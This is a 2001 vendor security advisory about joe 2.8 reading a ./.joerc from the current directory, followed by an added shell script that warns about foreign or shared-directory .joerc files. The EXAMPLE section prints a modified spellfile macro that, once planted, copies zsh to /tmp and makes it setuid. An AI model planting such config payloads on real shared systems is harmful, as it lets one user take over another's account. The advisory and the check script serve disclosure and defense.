WKIT SECURITY AB
www.wkit.com

TITLE:          Joe's Own Editor File Handling Error
ADVISORY ID:    WSIR-01/02-02
REFERENCE:      http://www.wkit.com/advisories
CVE:            GENERIC-MAP-NOMATCH
CREDIT:         Christer Öberg, Wkit Security AB
CONTACT:        [EMAIL PROTECTED]
CLASS:          File Handling Error
OBJECT:         joe(1) (exec)
VENDOR:         Josef H. Allen
STATUS:         REMOTE: No   LOCAL: Yes
VULNERABLE:     Joseph Allen joe 2.8
DATE CREATED:   26/02/2001
LAST UPDATED:
VENDOR CONTACT:
RELEASE:        28/02/2001

VULNERABILITY DESCRIPTION

joe looks for its configuration file in ./.joerc (the current working directory), $HOME/.joerc, and /usr/local/lib/joerc, in that order. Since the copy in the current directory is read first, users can be tricked into executing commands if they open or edit a file with joe in a directory where other users can write.

CONDITIONS

The user runs joe in a world- or group-writable directory.

EXAMPLE

A user copies the default joerc file into a world-writable directory and changes

:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype

to

:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype

Another user opens a file in that directory with joe and runs ispell with ^[l; the result is a suid shell in /tmp.

SOLUTION/VENDOR INFORMATION/WORKAROUND

DISCLAIMER

The contents of this advisory may be distributed freely, provided that no fee is charged and proper credit is given. Wkit Security AB takes no credit for this discovery if someone else has published this information in the public domain before this advisory was released. The information herein is intended for educational purposes, not for malicious use. Wkit Security AB takes no responsibility whatsoever for the use of this information.

ABOUT

Wkit Security AB is an independent data security company working with security-related services and products.

Wkit Security AB
Upperudsv. 4
S-464 72 Håverud
SWEDEN
http://www.wkit.com
e-mail: [EMAIL PROTECTED]

(C) 2001 WKIT SECURITY AB
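The advisory leaves the workaround section empty. The following POSIX shell script is an added example, not part of the advisory or of joe itself; it applies the search order given under VULNERABILITY DESCRIPTION (./.joerc before $HOME/.joerc and /usr/local/lib/joerc) to warn a user before they start joe in a directory where a planted ./.joerc would be honoured. The function name joerc_risk and the script name check-joerc.sh are assumptions; the checks rely only on ls, cut, awk and id.

```shell
#!/bin/sh
# Added example (not from the advisory): flag directories where joe would
# read a ./.joerc that another account could have written.
#
# joerc_risk DIR
#   exit status 0: no ./.joerc in DIR, or it is ours in a non-shared directory
#   exit status 1: ./.joerc exists and either belongs to another account or
#                  sits in a group/world-writable directory (the condition
#                  named in the advisory), so joe would trust a planted config

joerc_risk() {
    dir=${1:-.}
    rc="$dir/.joerc"

    # No directory-local joerc: joe falls through to $HOME/.joerc and the
    # system-wide /usr/local/lib/joerc, which this attack does not touch.
    if [ ! -e "$rc" ]; then
        return 0
    fi

    me=$(id -un)

    # "ls -ld" prints e.g. "drwxrwxrwt 2 alice users 4096 ... /tmp/shared":
    # characters 1-10 are the mode bits, field 3 is the owner.
    dperm=$(ls -ld "$dir" | cut -c1-10)
    dgroupw=$(printf '%s' "$dperm" | cut -c6)   # group write bit
    dotherw=$(printf '%s' "$dperm" | cut -c9)   # other write bit
    rcowner=$(ls -ld "$rc" | awk '{print $3}')

    status=0
    if [ "$rcowner" != "$me" ]; then
        echo "WARNING: $rc is owned by $rcowner, not $me" >&2
        status=1
    fi
    if [ "$dgroupw" = "w" ] || [ "$dotherw" = "w" ]; then
        echo "WARNING: $dir is group/world writable ($dperm);" \
             "a ./.joerc there could have been planted by anyone" >&2
        status=1
    fi
    return "$status"
}

# Usage: sh check-joerc.sh DIR   (run it before starting joe in a shared tree)
[ "$#" -eq 0 ] || joerc_risk "$1"
```

If the script warns, the safe options that follow directly from the lookup order in the advisory are to start joe from a directory you control (for instance your home directory) and open the shared file by its full path, so that ./.joerc is resolved in your own directory rather than the shared one, or to remove the foreign .joerc if you are entitled to. The script is a user-side check only; it does not change joe's behaviour.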